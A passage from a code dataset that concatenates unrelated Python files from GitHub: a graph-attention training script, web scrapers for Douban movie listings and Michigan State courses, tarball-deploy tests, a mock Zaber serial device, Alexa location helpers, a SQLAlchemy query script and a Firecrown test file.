Y[0:int(split_rate * Y.shape[0])]\n y_test = Y[int(split_rate * Y.shape[0]):]\n\n features = Variable(torch.FloatTensor(x_train[0])).to(args.device)\n adj = Variable(torch.FloatTensor(np.ones([features.shape[0],features.shape[0]]))).to(args.device)\n labels = Variable(torch.LongTensor(y_train[0])).to(args.device)\n\n\n # Model and optimizer\n if args.sparse:\n model = SpGAT(nfeat=features.shape[1],\n nhid=args.hidden,\n nclass=int(y_train.max()) + 1,\n dropout=args.dropout,\n nheads=args.nb_heads,\n alpha=args.alpha)\n else:\n model = GConvAT(nfeat=features.shape[1],\n nhid=args.hidden,\n nclass=int(y_train.max()) + 1,\n dropout=args.dropout,\n nheads=args.nb_heads,\n alpha=args.alpha)\n optimizer = optim.Adam(model.parameters(),\n lr=args.lr,\n weight_decay=args.weight_decay)\n\n if args.cuda:\n model.cuda()\n\n # Train model\n t_total = time.time()\n save_dir = time.strftime('GConvAT(%b %d %H.%M.%S %Y)')\n os.mkdir(save_dir)\n with open('{}/settings.txt'.format(save_dir), 'w') as f: f.write(args.__str__())\n log_file = sys.stdout if args.no_log else open('{}/logs.txt'.format(save_dir), 'w')\n loss_values = []\n bad_counter = 0\n best = args.epochs + 1\n best_epoch = 0\n for epoch in range(args.epochs):\n loss_values.append(train(epoch))\n\n torch.save(model.state_dict(), '{}/{}.pkl'.format(save_dir, epoch))\n if loss_values[-1] < best:\n best = loss_values[-1]\n best_epoch = epoch\n bad_counter = 0\n print('save best to:', save_dir, file=log_file)\n else:\n bad_counter += 1\n\n if bad_counter == args.patience:\n break\n\n files = glob.glob('{}/*.pkl'.format(save_dir))\n for file in files:\n epoch_nb = int(os.path.split(file)[-1].split('.')[0])\n if epoch_nb < best_epoch:\n os.remove(file)\n\n files = glob.glob('{}/*.pkl'.format(save_dir))\n for file in files:\n epoch_nb = int(os.path.split(file)[-1].split('.')[0])\n if epoch_nb > best_epoch:\n os.remove(file)\n\n print(\"Optimization Finished!\", file=log_file, flush=True)\n print(\"Total time elapsed: {:.4f}s\".format(time.time() - t_total))\n\n # Restore best 
model\n    print('Loading {}th epoch'.format(best_epoch))\n    model.load_state_dict(torch.load('{}/{}.pkl'.format(save_dir, best_epoch)))\n\n    # Testing\n    compute_test()\n","repo_name":"subercui/pyGConvAT","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"25929847003","text":"# encoding: utf-8\n\nimport requests\nfrom lxml import etree\n\n\n# 1. Fetch the page from the target website\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Referer\": \"https://movie.douban.com/\"\n}\nurl = \"https://movie.douban.com/cinema/nowplaying/hangzhou/\"\nresp = requests.get(url=url, headers=headers)\ntext = resp.text\n# print(text)\n# with open(\"douban_movie.html\", \"w\", encoding=\"utf-8\") as f:\n# f.write(resp.content.decode(\"utf-8\"))\n# resp.text returns a decoded string, of type str (unicode)\n# resp.content returns the raw, unprocessed string fetched from the page, of type bytes\n\n# 2. Extract data from the fetched page according to a set of rules\nmovies = list()\nhtml = etree.HTML(text)\n# //ul[@class=\"lists\"]\nul = html.xpath(\"//ul[@class='lists']\")[0]\n# print(etree.tostring(ul, encoding=\"utf-8\").decode(\"utf-8\"))\n# ./li\nlis = ul.xpath(\"./li\")\nfor li in lis:\n # print(etree.tostring(li, encoding=\"utf-8\").decode(\"utf-8\"))\n # @data-title\n title = li.xpath(\"@data-title\")[0]\n # @data-score\n score = li.xpath(\"@data-score\")[0]\n # @data-duration\n duration = li.xpath(\"@data-duration\")[0]\n # @data-region\n region = li.xpath(\"@data-region\")[0]\n # @data-director\n director = li.xpath(\"@data-director\")[0]\n # @data-actors\n actors = li.xpath(\"@data-actors\")[0]\n # .//img/@src\n thumbnail = li.xpath(\".//img/@src\")[0]\n # print(thumbnail)\n movie = {\n \"title\": title,\n \"score\": score,\n \"duration\": duration,\n \"region\": region,\n \"director\": director,\n \"actors\": actors,\n \"thumbnail\": thumbnail\n }\n movies.append(movie)\n\nprint(movies)\n\n","repo_name":"kcshan/python_spider_study","sub_path":"17.douban_spider.py","file_name":"17.douban_spider.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"37296261869","text":"import io\nimport itertools\nimport os\nimport subprocess\nfrom tarfile import TarFile, TarInfo\n\nimport pytest\n\n\n@pytest.fixture\ndef tarballs():\n def tarballs_generator():\n count = 0\n while True:\n count += 1\n content = f\"foo #{count}\".encode()\n tar_bytes = io.BytesIO()\n with TarFile(fileobj=tar_bytes, mode=\"w\") as tarfile:\n tarinfo = TarInfo(\"foo.txt\")\n tarinfo.size = len(content)\n tarfile.addfile(tarinfo, io.BytesIO(content))\n yield tar_bytes.getvalue()\n\n return tarballs_generator()\n\n\n@pytest.fixture\ndef tarball(tarballs):\n return next(tarballs)\n\n\ndef test_implicit_deploy_from_stdin(tmp_path, tarball):\n r = subprocess.run(\n f\"tarball-deploy --workdir={tmp_path}\", shell=True, input=tarball\n )\n assert r.returncode == 0\n with open(tmp_path / \"current\" / \"foo.txt\") as f:\n assert f.read() == \"foo #1\"\n\n\ndef test_explicit_deploy_from_stdin(tmp_path, tarball):\n r = subprocess.run(\n f\"tarball-deploy --workdir={tmp_path} --from=-\", shell=True, input=tarball\n )\n assert r.returncode == 0\n with open(tmp_path / \"current\" / \"foo.txt\") as f:\n assert f.read() == \"foo #1\"\n\n\ndef test_deploy_from_file(tmp_path, tarball):\n with open(tmp_path / 
\"release.tar\", \"wb\") as f:\n f.write(tarball)\n r = subprocess.run(\n f\"tarball-deploy --workdir={tmp_path} --from={tmp_path}/release.tar\",\n shell=True,\n input=tarball,\n )\n assert r.returncode == 0\n with open(tmp_path / \"current\" / \"foo.txt\") as f:\n assert f.read() == \"foo #1\"\n\n\ndef test_deploy_hooks(tmp_path, tarball):\n os.mkdir(tmp_path / \"hooks\")\n for hook_name in [\"pre-deploy\", \"post-deploy\"]:\n with open(tmp_path / \"hooks\" / hook_name, \"w\") as f:\n f.write(f\"#!/bin/sh\\necho {hook_name} hook called.\")\n os.chmod(tmp_path / \"hooks\" / hook_name, 0o755)\n r = subprocess.run(\n f\"tarball-deploy --workdir={tmp_path}\",\n shell=True,\n input=tarball,\n capture_output=True,\n )\n # assert r.returncode == 0\n assert r.stdout == (b\"pre-deploy hook called.\\npost-deploy hook called.\\n\")\n\n\ndef test_repeated_deploys(tmp_path, tarballs):\n for tarball in itertools.islice(tarballs, 3):\n r = subprocess.run(\n f\"tarball-deploy --workdir={tmp_path} --from=-\", shell=True, input=tarball\n )\n assert r.returncode == 0\n with open(tmp_path / \"current\" / \"foo.txt\") as f:\n assert f.read() == \"foo #3\"\n with open(tmp_path / \"previous\" / \"foo.txt\") as f:\n assert f.read() == \"foo #2\"\n assert len(os.listdir(tmp_path / \"releases\")) == 2\n\n\ndef test_rollback(tmp_path, tarballs):\n for tarball in itertools.islice(tarballs, 2):\n subprocess.run(\n f\"tarball-deploy --workdir={tmp_path} --from=-\", shell=True, input=tarball\n )\n r = subprocess.run(f\"tarball-deploy --workdir={tmp_path} --rollback\", shell=True)\n assert r.returncode == 0\n with open(tmp_path / \"current\" / \"foo.txt\") as f:\n assert f.read() == \"foo #1\"\n","repo_name":"psliwka/tarball-deploy","sub_path":"tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37298564351","text":"\"\"\"mqtt_base setup.py.\"\"\"\n\nimport setuptools\nfrom mqtt_base.const import APP_NAME, VERSION\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=APP_NAME,\n version=VERSION,\n author=\"Crowbar Z\",\n author_email=\"crowbarz@outlook.com\",\n description=\"Event driven base framework for MQTT applications\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/crowbarz/mqtt-base\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Operating System :: POSIX :: Linux\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.9\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: System :: Monitoring\",\n \"Topic :: System :: Networking :: Monitoring\",\n ],\n python_requires=\">=3.9\",\n install_requires=[\n \"python-daemon==3.0.1\",\n \"paho-mqtt==1.6.1\",\n ],\n entry_points={\n \"console_scripts\": [\n \"mqtt-base=mqtt_base.mqtt_base:main\",\n ]\n },\n)\n","repo_name":"crowbarz/mqtt-base","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"789994707","text":"__all__ = [\"MockSerial\", \"MockLST\"]\n\nimport inspect\nimport logging\nimport queue\n\nimport serial\nfrom zaber.serial import 
AsciiCommand\n\n\nclass MockSerial:\n \"\"\"Implements mock serial.\n\n Parameters\n ----------\n port : `str`\n baudrate : `int`\n bytesize : `int`\n parity\n stopbits\n timeout : `None` or `float`\n xonxoff : `bool`\n rtscts : `bool`\n write_timeout : `None` or `float`\n dsrdtr : `bool`\n inter_byte_timeout : `None` or `float`\n exclusive : `None`\n\n Attributes\n ----------\n log : `logging.Logger`\n name : `str`\n baudrate : `int`\n bytesize : `int`\n parity\n stopbits\n timeout : `None` or `float`\n xonxoff : `bool`\n rtscts : `bool`\n write_timeout : `None` or `float`\n dsrdts : `bool`\n inter_byte_timeout : `None` or `float`\n exclusive : `bool`\n opened : `bool`\n device : `MockLST`\n message_queue : `queue.Queue`\n \"\"\"\n\n def __init__(\n self,\n port,\n baudrate=9600,\n bytesize=serial.EIGHTBITS,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n timeout=None,\n xonxoff=False,\n rtscts=False,\n write_timeout=None,\n dsrdtr=False,\n inter_byte_timeout=None,\n exclusive=None,\n ):\n self.log = logging.getLogger(__name__)\n self.name = port\n self.baudrate = baudrate\n self.bytesize = bytesize\n self.parity = parity\n self.stopbits = stopbits\n self.timeout = timeout\n self.xonxoff = xonxoff\n self.rtscts = rtscts\n self.write_timeout = write_timeout\n self.dsrdtr = dsrdtr\n self.inter_byte_timeout = inter_byte_timeout\n self.exclusive = exclusive\n self.opened = False\n\n self.device = MockLST()\n self.message_queue = queue.Queue()\n\n self.log.info(\"MockSerial created\")\n\n def readline(self, size=-1):\n \"\"\"Read the line.\n\n Parameters\n ----------\n size : `int`, optional\n The size of the line.\n\n Returns\n -------\n msg : `bytes`\n The message from the queue.\n \"\"\"\n self.log.info(\"Reading from queue\")\n msg = self.message_queue.get()\n self.log.info(msg.encode())\n return msg.encode()\n\n def write(self, data):\n \"\"\"Write the data.\n\n Parameters\n ----------\n data : `bytes`\n The command message.\n \"\"\"\n self.log.info(data)\n msg = self.device.parse_message(data)\n self.log.debug(msg)\n self.message_queue.put(msg)\n self.log.info(\"Putting into queue\")\n\n def close(self):\n \"\"\"Close the serial connection.\"\"\"\n self.log.info(\"Closing serial connection\")\n\n\nclass MockLST:\n \"\"\"Implements mock LinearStage.\n\n Attributes\n ----------\n log : `logging.Logger`\n position : `int`\n status : `str`\n device_number : `int`\n\n \"\"\"\n\n def __init__(self):\n self.log = logging.getLogger(__name__)\n self.position = 0\n self.status = \"IDLE\"\n self.device_number = 1\n self.log.info(\"MockLST created\")\n\n def parse_message(self, msg):\n \"\"\"Parse and return the result of the message.\n\n Parameters\n ----------\n msg : `bytes`\n The message to parse.\n\n Returns\n -------\n reply : `bytes`\n The reply of the command parsed.\n\n Raises\n ------\n NotImplementedError\n Raised when command is not implemented.\n \"\"\"\n self.log.info(msg)\n msg = AsciiCommand(msg)\n self.log.info(msg)\n split_msg = msg.data.split(\" \")\n self.log.debug(split_msg)\n if any(char.isdigit() for char in split_msg[-1]):\n parameter = split_msg[-1]\n command = split_msg[:-1]\n else:\n parameter = None\n command = split_msg\n self.log.debug(parameter)\n if command != []:\n command_name = \"_\".join(command)\n else:\n command_name = \"\"\n self.log.debug(command_name)\n methods = inspect.getmembers(self, inspect.ismethod)\n if command_name == \"\":\n return self.do_get_status()\n else:\n for name, func in methods:\n if name == f\"do_{command_name}\":\n 
self.log.debug(name)\n if parameter is None:\n reply = func()\n else:\n reply = func(parameter)\n self.log.debug(reply)\n return reply\n raise NotImplementedError()\n\n def do_get_pos(self):\n \"\"\"Return the position of the device.\n\n Returns\n -------\n str\n The formatted reply\n \"\"\"\n return f\"@{self.device_number} 0 OK {self.status} -- {self.position}\"\n\n def do_get_status(self):\n \"\"\"Return the status of the device.\n\n Returns\n -------\n str\n The formatted reply.\n \"\"\"\n return f\"@{self.device_number} 0 OK {self.status} -- 0\"\n\n def do_home(self):\n \"\"\"Home the device.\n\n Returns\n -------\n str\n The formatted reply.\n \"\"\"\n return f\"@{self.device_number} 0 OK {self.status} -- 0\"\n\n def do_move_abs(self, position):\n \"\"\"Move the device using absolute position.\n\n Parameters\n ----------\n position : `int`\n\n Returns\n -------\n str\n The formatted reply\n \"\"\"\n self.position = int(position)\n return f\"@{self.device_number} 0 OK {self.status} -- 0\"\n\n def do_move_rel(self, position):\n \"\"\"Move the device using relative position.\n\n Parameters\n ----------\n position : `int`\n\n Returns\n -------\n str\n The formatted reply.\n \"\"\"\n self.position += int(position)\n return f\"@{self.device_number} 0 OK {self.status} -- 0\"\n","repo_name":"lsst-ts/ts_linearstage","sub_path":"python/lsst/ts/linearstage/mocks/mock_zaber_lst.py","file_name":"mock_zaber_lst.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37122493091","text":"import os\nimport csv\nimport time\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom functools import partial\nfrom multiprocessing import Pool \nfrom help_functions import memory_optimize,memory_optimize2\n\ndef filter_pearson(x,y):\n return stats.pearsonr(x,y)[0]\n\ndef calculate_pearson(max_div, n):\n\n static_file = 'AMD_features_binary.csv'\n dynamic_file = 'extracted_features_all.csv'\n\n headers = []\n with open(dynamic_file, \"rt\") as f:\n reader = csv.reader(f)\n headers = next(reader)\n\n # Remove sample and variety as columns\n headers = headers[2:]\n max_headers = len(headers)/max_div\n\n if n == 1:\n columns = headers[:int(max_headers*n)]\n else:\n columns = headers[int(max_headers*(n-1)):int(max_headers*n)]\n\n df_chunk = pd.read_csv(dynamic_file, engine='c', low_memory=False, chunksize=5000, usecols=['sample', 'variety'] + columns)\n chunk_list = []\n for chunk in df_chunk:\n # Run memory optimization\n opt_chunk = memory_optimize2(chunk)\n # Append optimized chunk to chunk_list\n chunk_list.append(opt_chunk)\n\n # Concatinate the chunks into one dataframes\n df_dynamic = pd.concat(chunk_list)\n\n # load entire static dataset\n df_static = pd.read_csv(static_file, engine='c', low_memory=False)\n # Drop irrelevant data from static dataset\n df_static.drop(df_static.columns[1:4], axis=1, inplace=True)\n # Optimize since all data are binary\n df_static = memory_optimize(df_static)\n\n # Get dynamic and static columns\n dynamic_features = list(df_dynamic.columns)\n static_features = list(df_static.columns)\n\n # Merge static and dynamic datasets\n df_static_part = pd.DataFrame(index=df_dynamic.index, columns=static_features, dtype=np.uint16)\n for index, row in df_static_part.iterrows():\n df_static_part.loc[index] = df_static.loc[index[1]]\n df_concat = pd.concat([df_dynamic, df_static_part], axis=1)\n\n # Clear RAM from unnecessary datasets\n del [df_static, df_dynamic]\n\n # Leave 
1 core free from calculation\n max_workers = os.cpu_count() - 1\n pool = Pool(processes = max_workers)\n\n # result dataframe\n df_correlations = pd.DataFrame(index=dynamic_features, columns=static_features)\n\n # Get each dynamic feature values in to lists\n dynamic_feature_values = []\n for column in dynamic_features:\n dynamic_feature_values.append(list(df_concat[column])) \n\n print(f'INFO: Starting calculations.')\n start = time.time()\n # Run pearson correlation\n for static_feature in static_features:\n static_feature_values = list(df_concat[static_feature])\n results = pool.map(partial(filter_pearson, y=static_feature_values), dynamic_feature_values)\n df_correlations.loc[dynamic_features, static_feature] = results\n end = time.time()\n print(f'INFO: Calculations were completed in: {(end - start)/60} minutes.')\n # Write results to csv\n df_correlations.to_csv(f'Feature_Correlations{n}_{max_div}.csv', sep=',', encoding='utf-8')\n","repo_name":"vikre869/correlation_analysis","sub_path":"pearson_corr_analysis.py","file_name":"pearson_corr_analysis.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29480415598","text":"import scrapy\nfrom UniversityScraper.items import UniversityItem\nimport logging, re, traceback\nimport requests\nfrom lxml import html\n\n\n\nclass MsuSpider(scrapy.Spider):\n name = 'msu'\n #allowed_domains = ['www.reg.msu.edu']\n start_urls = ['https://reg.msu.edu/AcademicPrograms/Programs.aspx?PType=UN']\n\n def parse(self, response):\n Acadmic_programs_urls=response.xpath('//*[@id=\"divAPMenu\"]/div/a/@href').extract()\n\n logging.warn(\"msu; Scraping Started...; url= %s\", response.url)\n Acadmic_programs_urls=Acadmic_programs_urls[1:9]\n print(len(Acadmic_programs_urls))\n for Acadmic_programs_url in Acadmic_programs_urls:\n Acadmic_programs_url='https://reg.msu.edu/AcademicPrograms/'+Acadmic_programs_url\n yield scrapy.Request(Acadmic_programs_url,callback=self.course_link)\n\n\n def course_link(self,response):\n course_links=response.xpath('//*[@id=\"MainContent_divData\"]/div/a/@href').extract()\n logging.warn(\"msu; Scraping Courses Started....; url= %s\", response.url)\n ielts_url=fee_url=''\n ielts_da = self._get_ielts_pte_tofel(ielts_url)\n fee=self._get_fee(fee_url)\n for course_url in course_links:\n course_url='https://reg.msu.edu/AcademicPrograms/'+course_url\n yield scrapy.Request(course_url,callback=self.course_info,meta={'eng_data':ielts_da,'fee':fee})\n\n def course_info(self,response):\n try:\n item = UniversityItem()\n\n # 1 CourseName\n program=response.xpath('//*[@id=\"MainContent_tdProgram\"]/text()').get()\n award=response.xpath('//*[@id=\"MainContent_tdAward\"]/text()').get()\n comma=','\n course_name = award+comma+program\n item['course_name'] = course_name\n\n #degree_level\n degree_level=response.xpath('//*[@id=\"MainContent_tdLevel\"]/text()').get()\n item['degree_level']=degree_level\n\n #course_website\n course_website=response.url\n item['course_website']=course_website\n\n #fee data\n fee=response.request.meta['fee']\n\n #domestic_fee\n domestic_fee=fee[0]\n domestic_fee=re.findall(\"\\d+\", domestic_fee)\n item['domestic_fee']=domestic_fee\n\n #international fee\n international_fee=fee[1]\n international_fee=re.findall(\"\\d+\\,+\\d+\\d+\\d\", international_fee)\n item['international_fee'] =international_fee\n\n #fee term\n fee_term='year'\n item['fee_term']=fee_term\n\n #Domestic only\n if domestic_fee:\n domestic_only=True\n 
item['domestic_only']=domestic_only\n\n #fee_year\n fee_year='2021'\n item['fee_year']=fee_year\n\n\n #eng_data\n eng_req_score = response.request.meta['eng_data']\n\n\n # item['ielts_reading']=eng_req_score\n ielts_overall=eng_req_score[0]\n ielts_overall=re.findall(\"\\d+\\.+\\d\", ielts_overall)\n ielts_overall=' '.join(map(str, ielts_overall))\n item['ielts_overall']=ielts_overall\n\n #pte\n pte_data=eng_req_score[1]\n pte_data=re.findall(\"\\d+\", pte_data)\n pte_overall=pte_data[0]\n pte_reading=pte_data[1]\n pte_speaking=pte_data[1]\n pte_writing =pte_data[1]\n pte_listening=pte_data[1]\n\n item['pte_overall']=pte_overall\n item['pte_writing'] = pte_writing\n item['pte_speaking'] = pte_speaking\n item['pte_reading'] = pte_reading\n item['pte_listening'] = pte_listening\n\n #toeft\n toefl_data=eng_req_score[2]\n toefl_data=re.findall(\"\\d+\", toefl_data)\n toefl_overall=toefl_data[0]\n toefl_reading=toefl_data[1]\n toefl_writing =toefl_data[1]\n toefl_speaking =toefl_data[1]\n toefl_listening =toefl_data[1]\n\n item[\"toefl_listening\"] = toefl_listening\n item[\"toefl_writing\"] = toefl_writing\n item[\"toefl_reading\"] = toefl_reading\n item[\"toefl_speaking\"] = toefl_speaking\n item[\"toefl_overall\"] = toefl_overall\n\n #course_description\n course_description=response.xpath('//*[@id=\"MainContent_divDesc\"]/div/div[2]/p/text()').extract()\n item['course_description']=course_description\n\n #course structure\n course_structure=response.xpath('//*[@id=\"MainContent_divDesc\"]/div/div[2]/ol')\n\n if course_structure==None:\n course_structure=response.xpath('//*[@id=\"MainContent_divDesc\"]/div/div[2]/table')\n\n\n item['course_structure']=course_structure\n\n\n\n\n\n\n yield item\n\n\n\n\n\n except Exception as e:\n logging.error(\"msu; msg=Crawling Failed > %s;url= %s\", str(e), response.url)\n logging.error(\"msu; msg=Crawling Failed;url= %s;Error=%s\", response.url, traceback.format_exc())\n\n\n def _get_ielts_pte_tofel(self,ipt_url):\n page1 = requests.get('https://admissions.msu.edu/apply/international/before-you-apply/english-language-proficiency.aspx')\n response = html.fromstring(page1.content)\n english_req=[]\n ielts=response.xpath('//*[@id=\"msuDetail\"]/p[5]/text()')\n pte=response.xpath('//*[@id=\"msuDetail\"]/p[21]/text()')\n toefl=response.xpath('//*[@id=\"msuDetail\"]/ul[3]/li/text()')\n english_req.append(ielts)\n english_req.append(pte)\n english_req.append(toefl)\n english_req = list(map(''.join, english_req))\n return english_req\n\n def _get_fee(self,fee_url):\n page2=requests.get('https://admissions.msu.edu/cost-aid/tuition-fees/default.aspx')\n response=html.fromstring(page2.content)\n fee=[]\n domestic_fee=response.xpath('//*[@id=\"msuDetail\"]/p[1]/strong/text()')\n international_fee=response.xpath('//*[@id=\"msuDetail\"]/p[4]/strong/text()')\n fee.append(domestic_fee)\n fee.append(international_fee)\n fee=list(map(''.join, fee))\n return fee\n\n","repo_name":"dipusah/Scrapy","sub_path":"msu (1).py","file_name":"msu (1).py","file_ext":"py","file_size_in_byte":6154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73267118826","text":"import requests\nimport logging\nfrom mycity.intents import intent_constants\nfrom mycity.intents.speech_constants.location_speech_constants import \\\n GENERIC_GEOLOCATION_PERMISSON_SPEECH, GENERIC_DEVICE_PERMISSON_SPEECH\nimport mycity.utilities.gis_utils as gis_utils\nimport mycity.mycity_response_data_model as mycity_response_data_model\nimport 
usaddress\n\n\"\"\" Methods for working with location based data \"\"\"\nlogger = logging.getLogger(__name__)\n\n\ndef get_address_from_user_device(mycity_request):\n \"\"\"\n checks Amazon api for device address permissions. \n If given, the address, if present, will be stored \n in the session attributes\n :param mycity_request: MyCityRequestDataModel\n :param mycity_response: MyCityResponseDataModel\n :return : MyCityRequestModel object and boolean indicating if we have\n device address permissions\n \"\"\"\n logger.debug('MyCityRequestDataModel received:' + mycity_request.\n get_logger_string())\n\n base_url = \"https://api.amazonalexa.com/v1/devices/{}\" \\\n \"/settings/address\".format(mycity_request.device_id)\n head_info = {'Accept': 'application/json',\n 'Authorization': 'Bearer {}'.format(mycity_request.\n api_access_token)}\n response_object = requests.get(base_url, headers=head_info)\n\n logger.debug(\"response object:{}\".format(response_object))\n try:\n res = response_object.json()\n if response_object.status_code == 200 and res['addressLine1'] is not None:\n address = res['addressLine1']\n state = res['stateOrRegion']\n city = res['city']\n current_address = \" \".join([address, city, state])\n mycity_request.session_attributes[\n intent_constants.CURRENT_ADDRESS_KEY] = current_address\n except Exception:\n # If we fail to parse a response, just return like we don't have\n # sufficient permissions\n return mycity_request, False\n return mycity_request, response_object.status_code == 200\n\n\ndef request_geolocation_permission_response():\n \"\"\"\n Builds a response object for requesting geolocation permissions. The\n returned object's speech can be modified if you want to add more information.\n\n :return MyCityResponseDataModel: MyCityResponseDataModel with required fields\n to request geolocation access\n \"\"\"\n response = mycity_response_data_model.MyCityResponseDataModel()\n response.output_speech = GENERIC_GEOLOCATION_PERMISSON_SPEECH\n response.card_type = \"AskForPermissionsConsent\"\n response.card_permissions = [\"alexa::devices:all:geolocation:read\"]\n response.should_end_session = True\n return response\n\n\ndef request_device_address_permission_response():\n \"\"\"\n Builds a response object for requesting geolocation permissions. 
The\n returned object's speech can be modified if you want to add more information.\n\n :return MyCityResponseDataModel: MyCityResponseDataModel with required fields\n to request geolocation access\n \"\"\"\n response = mycity_response_data_model.MyCityResponseDataModel()\n response.output_speech = GENERIC_DEVICE_PERMISSON_SPEECH\n response.card_type = \"AskForPermissionsConsent\"\n response.card_permissions = [\"read::alexa:device:all:address\"]\n response.should_end_session = True\n return response\n\n\ndef convert_mycity_coordinates_to_arcgis(mycity_request) -> dict:\n \"\"\"\n Gets coordinates from a MyCityRequestDataModel and converts them to dictionary\n required by GIS utilities\n\n :param mycity_request: MyCityRequstDataModel containing geolocation coordinates\n to convert\n :return dictionary: x, y coordinates of device location\n \"\"\"\n gis_coordinates = {\n 'x': 0,\n 'y': 0\n }\n \n if mycity_request.geolocation_coordinates:\n gis_coordinates['y'] = mycity_request.geolocation_coordinates[\"latitudeInDegrees\"]\n gis_coordinates['x'] = mycity_request.geolocation_coordinates[\"longitudeInDegrees\"]\n\n return gis_coordinates\n\n\ndef is_in_city(mycity_request, city):\n \"\"\"\n Reverse geo-locate the session's coordinates to determine if the device is\n in Boston\n :param city: City to check reverse geo-location to\n :param mycity_request: MyCityRequestDataModel\n :return: True or False\n \"\"\"\n logger.debug('MyCityRequestDataModel received:' +\n mycity_request.get_logger_string())\n\n if mycity_request.geolocation_coordinates:\n return are_coordinates_in_city(\n mycity_request.geolocation_coordinates,\n [city])\n\n return True\n\n\ndef are_coordinates_in_city(coordinates, cities):\n \"\"\"\n Checks if the provided coordinates are in any\n of the cities provided\n :param coordinates: Dictionary of coordinates\n :param cities: Array of possible cities to check against\n :return: True if coordinates are in one of the cities. False if not.\n \"\"\"\n if 'latitudeInDegrees' in coordinates:\n coordinates['y'] = coordinates[\"latitudeInDegrees\"]\n coordinates['x'] = coordinates[\"longitudeInDegrees\"]\n\n lat = coordinates['y']\n long = coordinates['x']\n\n location = gis_utils.reverse_geocode_addr([long, lat])\n if location['address']['City'] in cities and \\\n location['address']['Region'] == 'Massachusetts':\n return True\n\n return False\n\n\ndef is_address_in_city(address):\n \"\"\"\n Check if the provided address is in Boston\n :param address: the adress to check\n :return: boolean\n \"\"\"\n\n # If we don't have any detail about city or zipcode\n # we default to Boston for the geocode search\n parsed_address, _ = usaddress.tag(address)\n if \"PlaceName\" not in parsed_address and \"ZipCode\" not in parsed_address:\n address = \" \".join([address, \"Boston\"])\n\n city = 'Boston Metro Area'\n return gis_utils.geocode_addr(address, city)\n\n\ndef is_location_in_city(address, coordinates):\n \"\"\"\n Determines if the provided address or coordinates\n are located in Boston. If both are provided,\n address takes priority\n :param address: String of address to check. Can be None.\n :param coordinates: Dictionary of coordinates to check. Can be None.\n :return: True if location is in Boston. 
False if not.\n \"\"\"\n if address:\n return is_address_in_city(address)\n if coordinates:\n return are_coordinates_in_city(coordinates, gis_utils.NEIGHBORHOODS)\n\n return True\n","repo_name":"codeforboston/voiceapp311","sub_path":"mycity/mycity/utilities/location_services_utils.py","file_name":"location_services_utils.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"37"} +{"seq_id":"27341798350","text":"#!/usr/bin/python3\n\"\"\"Write a script that lists all State objects from the\n database hbtn_0e_6_usa using SQLAlchemy ORM\n\n Note: add an object to the database\n \"\"\"\n\nimport sys\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy import (create_engine)\nfrom relationship_city import City\nfrom relationship_state import Base, State\n\n\nif __name__ == \"__main__\":\n username = sys.argv[1]\n pwd = sys.argv[2]\n db_name = sys.argv[3]\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(\n sys.argv[1], sys.argv[2],\n sys.argv[3]), pool_pre_ping=True)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n for c in session.query(City).join(State).order_by(City.id).all():\n print(\"{}: {} -> {}\".format(c.id, c.name, c.state.name))\n","repo_name":"Olakunle64/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/102-relationship_cities_states_list.py","file_name":"102-relationship_cities_states_list.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"765787397","text":"\"\"\"\nTests for the module firecrown.likelihood.gauss_family.statistic.statistic.\n\"\"\"\nfrom typing import List\nimport numpy as np\nimport pytest\nimport sacc\n\nimport firecrown.likelihood.gauss_family.statistic.statistic as stat\n\n\nVECTOR_CLASSES = (stat.TheoryVector, stat.DataVector)\n\n\ndef test_vector_create():\n vals = np.random.random_sample((10,))\n assert isinstance(vals, np.ndarray)\n assert vals.dtype == np.float64\n assert vals.shape == (10,)\n for cls in VECTOR_CLASSES:\n result = cls.create(vals) # type: ignore\n assert isinstance(result, cls)\n assert result.shape == (10,)\n assert np.array_equal(vals, result)\n\n\ndef test_vector_from_list():\n vals = [1.5, 2.5, -3.0, 10.0]\n assert isinstance(vals, list)\n assert len(vals) == 4\n for cls in VECTOR_CLASSES:\n result = cls.from_list(vals) # type: ignore\n assert isinstance(result, cls)\n assert result.shape == (4,)\n for i, val in enumerate(vals):\n assert result[i] == val\n\n\ndef test_vector_slicing():\n for cls in VECTOR_CLASSES:\n vec = cls.create(np.random.random_sample((12,))) # type: ignore\n assert 